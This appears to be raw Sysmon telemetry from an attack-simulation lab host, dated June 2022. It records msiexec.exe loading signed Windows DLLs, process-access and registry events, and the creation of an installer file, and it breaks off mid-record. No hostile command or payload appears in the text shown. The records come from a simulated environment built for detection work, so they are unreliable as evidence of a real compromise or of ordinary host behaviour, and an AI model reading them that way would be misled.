CorporationSHCORE.dllMD5=FC58D75DDAF44088B9101BE2418B1967,SHA256=74A0CCA04F2405A329897A6A1A3E90A0CE48E5772F85E7188C75677CD9D78160trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694175Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.756{7CF983DC-9825-62AC-2B6B-000000006202}3856C:\Windows\System32\msiexec.exeC:\Windows\System32\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=C55F634054E45C0DEE47C254AE009928,SHA256=76EB0FCA87C3AD5FA1C46EB0AF88CF85E172525029E33F5DFC5645EF2EE6F575trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694174Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.756{7CF983DC-9825-62AC-2B6B-000000006202}3856C:\Windows\System32\msiexec.exeC:\Windows\System32\windows.storage.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=BB44598D2B17603D605EDE11A148A21B,SHA256=C45410A330C2EC62581E18FD91F8CDB9873B8F64E5C5ACC79DB4970238077177trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694173Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.756{7CF983DC-9825-62AC-2B6B-000000006202}3856C:\Windows\System32\msiexec.exeC:\Windows\System32\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=77BF2979C1A08EBA43C24FE0B7E547BE,SHA256=071E00374806E043A2E78E88C7FDDCE8F5983DE665DF41F3B3210660BF2EF704trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694172Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.756{7CF983DC-9825-62AC-2B6B-000000006202}3856C:\Windows\System32\msiexec.exeC:\Windows\System32\shell32.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=B47A76105A5F59EDA244105A6D5D51D1,SHA256=012675AF0811AA0787D3731FED4D186F6D1B6279F27B2BF360AB49CA457F4E25trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694171Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.756{7CF983DC-9825-62AC-2B6B-000000006202}3856C:\Windows\System32\msiexec.exeC:\Windows\System32\msi.dll5.0.14393.5127Windows InstallerWindows Installer - UnicodeMicrosoft Corporationmsi.dllMD5=F8E11A5BD7A918A13BA3C7924B5AD360,SHA256=98B5EBA9E9A0DD04885D594851A6CACF79304F7524959F502F5DA034B2C6BE60trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694170Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.741{7CF983DC-9825-62AC-2B6B-000000006202}3856C:\Windows\System32\msiexec.exeC:\Windows\System32\clbcatq.dll2001.12.10941.16384 (rs1_release.210107-1130)COM+ Configuration CatalogMicrosoft® Windows® Operating SystemMicrosoft CorporationCLBCATQ.DLLMD5=A82FB68F785E73141F5ABC91850595A8,SHA256=416DE0DA209CDCBE9B5D1A868CE972F8FE3399FF62E84EFD46D6FD49BDF7B7B2trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002694169Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.741{7CF983DC-EE56-62A8-0C00-000000006202}708752C:\Windows\system32\svchost.exe{7CF983DC-9825-62AC-2B6B-000000006202}3856C:\Windows\System32\MsiExec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+40856|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+54f9b|C:\Windows\System32\RPCRT4.dll+5367a|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694168Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.741{7CF983DC-9825-62AC-2B6B-000000006202}3856C:\Windows\System32\msiexec.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694167Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.741{7CF983DC-9825-62AC-2B6B-000000006202}3856C:\Windows\System32\msiexec.exeC:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=FD486B6FA360ABE43E02E85F3164E9BE,SHA256=733922A216EC03FC6AA405205CD2F8BB81A39180F26839588B97F310E21071B5trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694166Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.741{7CF983DC-9825-62AC-2B6B-000000006202}3856C:\Windows\System32\msiexec.exeC:\Windows\System32\ole32.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=EB53D1BF6E1667C8727EBBB5D5A862ED,SHA256=2B3D48DFA43A284B1C66A8A98B0A48104133D86EEEB2E8E060BE2281CF476348trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694165Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.741{7CF983DC-9825-62AC-2B6B-000000006202}3856C:\Windows\System32\msiexec.exeC:\Windows\System32\sechost.dll10.0.14393.5006 (rs1_release.220301-1704)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=9F0F4C38A22FC9FFB8814F77A9563680,SHA256=E9ABDA1063716301F5D06DBC94D6A35B3F53A14B946525E5F764485132DB6166trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694164Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.741{7CF983DC-9825-62AC-2B6B-000000006202}3856C:\Windows\System32\msiexec.exeC:\Windows\System32\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=C42106182CCA611F629E46981D1A0EEA,SHA256=68C134F95A8D38AE84545C8D581F4BF808B6C9D97513EA3CABF019C66419CBAEtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694163Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.741{7CF983DC-9825-62AC-2B6B-000000006202}3856C:\Windows\System32\msiexec.exeC:\Windows\System32\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=E1024CF2E35DD3467F52BC83F7FEDA3F,SHA256=59C87761AD509BD096C2F35257C2370FB94B95160CB63FB9E66DFD8210AB002AtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694162Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.741{7CF983DC-9825-62AC-2B6B-000000006202}3856C:\Windows\System32\msiexec.exeC:\Windows\System32\sfc_os.dll10.0.14393.0 (rs1_release.160715-1616)Windows File ProtectionMicrosoft® Windows® Operating SystemMicrosoft Corporationsfc_os.dllMD5=B80907BCF327C925E7AC990D81A705E6,SHA256=58A71BD4A0DDA6EAE49A50ABF92F73FD1792B218B7F811E06431CEF8EFF77040trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694161Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.741{7CF983DC-9825-62AC-2B6B-000000006202}3856C:\Windows\System32\msiexec.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694160Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.741{7CF983DC-9825-62AC-2B6B-000000006202}3856C:\Windows\System32\msiexec.exeC:\Windows\System32\winspool.drv10.0.14393.5127 (rs1_release_inmarket.220514-1756)Windows Spooler DriverMicrosoft® Windows® Operating SystemMicrosoft Corporationwinspool.drvMD5=592EDD495F3F412C7E917CABE9B2A15E,SHA256=FC5D6EA6C14E6AA94ADE04D6D0C3AAAB8942864B118DE8219A712133DEF50550trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694159Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.741{7CF983DC-9825-62AC-2B6B-000000006202}3856C:\Windows\System32\msiexec.exeC:\Windows\System32\sfc.dll10.0.14393.0 (rs1_release.160715-1616)Windows File ProtectionMicrosoft® Windows® Operating SystemMicrosoft Corporationsfc.dllMD5=22BEEEDFF247B8F90252646C91E775E5,SHA256=10F0FF6F6F21CCC3343BCBCC9B5158A95EC328C1C21F3B9482C688848B89E1DDtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694158Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.741{7CF983DC-9825-62AC-2B6B-000000006202}3856C:\Windows\System32\msiexec.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=54417B63FB3760BC6DBC5DB1BDA4C272,SHA256=B7A8B457B252AB949C067D5FCFEFB2AE98E9115B958D2A0FC120D7B13B3E9FADtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694157Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.741{7CF983DC-9825-62AC-2B6B-000000006202}3856C:\Windows\System32\msiexec.exeC:\Windows\System32\rpcrt4.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=920CEBB474555470F1FFB129AD6E19D8,SHA256=DE1C8EA3EF80E7A0E42664559AF3B29FE89E29189382AFC0B438D9C21E2D909AtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694156Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.741{7CF983DC-9825-62AC-2B6B-000000006202}3856C:\Windows\System32\msiexec.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694155Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.741{7CF983DC-9825-62AC-2B6B-000000006202}3856C:\Windows\System32\msiexec.exeC:\Windows\System32\combase.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=148F67CE7413EB2D4D777030DFCCD28B,SHA256=5CBD4E213A26B9D8BE56677946D294F65FC615D710F8E07909B643D437819161trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694154Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.741{7CF983DC-9825-62AC-2B6B-000000006202}3856C:\Windows\System32\msiexec.exeC:\Windows\System32\shlwapi.dll10.0.14393.5125 (rs1_release.220429-1732)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=407E895A220DE1A60C5B555A113FE998,SHA256=FE184347784F83953457146562E0F6C87C8DA04D0288415465631325A2A98C92trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694153Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.741{7CF983DC-9825-62AC-2B6B-000000006202}3856C:\Windows\System32\msiexec.exeC:\Windows\System32\gdi32full.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=F284A98093B423946252259D7D2857D3,SHA256=193F70529B68EF108EA17ABC069E6DACF4541A547DF1D2F249F7555A58BCFA07trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694152Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.741{7CF983DC-9825-62AC-2B6B-000000006202}3856C:\Windows\System32\msiexec.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694151Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.741{7CF983DC-9825-62AC-2B6B-000000006202}3856C:\Windows\System32\msiexec.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694150Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.741{7CF983DC-9825-62AC-2B6B-000000006202}3856C:\Windows\System32\msiexec.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694149Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.741{7CF983DC-9825-62AC-2B6B-000000006202}3856C:\Windows\System32\msiexec.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694148Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.741{7CF983DC-9825-62AC-2B6B-000000006202}3856C:\Windows\System32\msiexec.exeC:\Windows\AppPatch\apppatch64\AcLayers.dll10.0.14393.2879 (rs1_release_inmarket.190313-1855)Windows Compatibility DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationACLAYERS.DLLMD5=18D8E2D6C17577D91A40C4A5AD9F6E37,SHA256=9E9CF9446EDA1F064E996F2022DBD3B3C7D6778574EA790B2B0412EA41C5F5F0trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694147Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.725{7CF983DC-9825-62AC-2B6B-000000006202}3856C:\Windows\System32\msiexec.exeC:\Windows\System32\apphelp.dll10.0.14393.4350 (rs1_release.210407-2154)Application Compatibility Client LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationApphelpMD5=92330FA0551BFFBB8C1C97E86F9A0264,SHA256=0F341AF375236EBF7047F6AE50F2834566F0D859F0F02B8A5FFD7F29C31B0117trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002694146Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.725{7CF983DC-EE97-62A8-7E00-000000006202}18083404C:\Windows\system32\csrss.exe{7CF983DC-9825-62AC-2B6B-000000006202}3856C:\Windows\System32\MsiExec.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694145Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.725{7CF983DC-9825-62AC-2B6B-000000006202}3856C:\Windows\System32\msiexec.exeC:\Windows\System32\KernelBase.dll10.0.14393.5125 (rs1_release.220429-1732)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=D8F18C830B03B0D60C10093ECB020E60,SHA256=CF0D33CEC46BB41C6F5693A84491ACD7F7CBECB429BA6C47AB5A170D4DF3484FtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694144Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.725{7CF983DC-9825-62AC-2B6B-000000006202}3856C:\Windows\System32\msiexec.exeC:\Windows\System32\kernel32.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=92D599E644B89C0F9E7DDB55762EBEA6,SHA256=F32D28EE73EADAF9EF3F30145FA3C52B88DF47236B8747434750832BF1B9CDEEtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694143Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.725{7CF983DC-9825-62AC-2B6B-000000006202}3856C:\Windows\System32\msiexec.exeC:\Windows\System32\ntdll.dll10.0.14393.5006 (rs1_release.220301-1704)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F5EE39B17A8BCDEDC3D40997C26F62B1,SHA256=11C1C88B1CC11D9800DEEF27ED7ABDFDE3DC852687A3B9FBD5153284106E5952trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694142Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.725{7CF983DC-9825-62AC-2B6B-000000006202}3856C:\Windows\System32\msiexec.exeC:\Windows\System32\msiexec.exe5.0.14393.2430 (rs1_release_inmarket_aim.180806-1810)Windows® installerWindows Installer - UnicodeMicrosoft Corporationmsiexec.exeMD5=F10B3635225BE24A677CB3BB71824D07,SHA256=B5D755B0B561AA8FDAFF156E3715A333179B14C171EFB53392D4D806D14CF9C9trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002694141Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.725{7CF983DC-EE55-62A8-0500-000000006202}396512C:\Windows\system32\csrss.exe{7CF983DC-9825-62AC-2B6B-000000006202}3856C:\Windows\System32\MsiExec.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002694140Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.725{7CF983DC-981D-62AC-1A6B-000000006202}48403928C:\Windows\system32\msiexec.exe{7CF983DC-9825-62AC-2B6B-000000006202}3856C:\Windows\System32\MsiExec.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6f523|C:\Windows\System32\ADVAPI32.dll+189bf|C:\Windows\system32\Msi.dll+ba6c8|C:\Windows\system32\Msi.dll+16e294|C:\Windows\system32\Msi.dll+16e90c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 154100x80000000000000002694139Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.736{7CF983DC-9825-62AC-2B6B-000000006202}3856C:\Windows\System32\msiexec.exe5.0.14393.2430 (rs1_release_inmarket_aim.180806-1810)Windows® installerWindows Installer - UnicodeMicrosoft Corporationmsiexec.exeC:\Windows\System32\MsiExec.exe -Embedding A90F48C038CE1EB11A957423A237594DC:\Windows\system32\WIN-HOST-MHAAG-\Administrator{7CF983DC-EE99-62A8-FF22-070000000000}0x722ff2HighMD5=F10B3635225BE24A677CB3BB71824D07,SHA256=B5D755B0B561AA8FDAFF156E3715A333179B14C171EFB53392D4D806D14CF9C9{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\system32\msiexec.exe /VNT AUTHORITY\SYSTEM 13241300x80000000000000002694138Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-SetValue2022-06-17 15:05:09.709{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000\SequenceDWORD (0x00000001)NT AUTHORITY\SYSTEM 12241200x80000000000000002694137Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:09.709{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 13241300x80000000000000002694136Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-SetValue2022-06-17 15:05:09.709{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000\SessionHashBinary DataNT AUTHORITY\SYSTEM 13241300x80000000000000002694135Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-SetValue2022-06-17 15:05:09.709{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000\OwnerBinary DataNT AUTHORITY\SYSTEM 12241200x80000000000000002694134Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:09.709{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 12241200x80000000000000002694133Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:09.709{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 10341000x80000000000000002694132Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.709{7CF983DC-981D-62AC-1A6B-000000006202}48402916C:\Windows\system32\msiexec.exe{7CF983DC-9825-62AC-2A6B-000000006202}1952c:\windows\system32\msiexec.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\apphelp.dll+20ffd|C:\Windows\system32\apphelp.dll+209c1|C:\Windows\system32\Msi.dll+19fdbd|C:\Windows\system32\Msi.dll+2ea9e|C:\Windows\system32\Msi.dll+474f5|C:\Windows\system32\Msi.dll+10b3b5|C:\Windows\system32\Msi.dll+10a5d6|C:\Windows\system32\Msi.dll+f4b9f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694131Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.709{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\fusion.dll4.8.3761.0 built by: NET48REL1Assembly managerMicrosoft® .NET FrameworkMicrosoft Corporationfusion.dllMD5=2A73BA7551F7B631AA484CAABD372F06,SHA256=F876EEEC603221DCDD098D1E2A1118012254E9C67851E749DF61D573EA949F55trueMicrosoft CorporationValidNT AUTHORITY\SYSTEM 734700x80000000000000002694130Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.694{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll4.8.4180.0 built by: NET48REL1LAST_BMicrosoft .NET Runtime Execution EngineMicrosoft® .NET FrameworkMicrosoft Corporationmscoreei.dllMD5=899A8B655E52A061B33571D97C5C06ED,SHA256=DE05B03E37FB9BA5D74CF8FA36A6F0B15AB61705285B738BC90D14FDE580A45EtrueMicrosoft CorporationValidNT AUTHORITY\SYSTEM 734700x80000000000000002694129Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.694{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\System32\mscoree.dll10.0.14393.0 (rs1_release.160715-1616)Microsoft .NET Runtime Execution EngineMicrosoft® Windows® Operating SystemMicrosoft Corporationmscoree.dllMD5=5ECE402D7E12EC3750D044BF3D878DF6,SHA256=3F02B1AE7B61BC36B04EA2B82ED79F112219F4E9668518030FF14B005E2C9BBCtrueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 254200x80000000000000002694128Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.694{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeC:\Windows\Installer\e4f5144.msi2022-06-13 14:04:24.0002022-06-17 15:05:09.694NT AUTHORITY\SYSTEM 10341000x80000000000000002694127Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 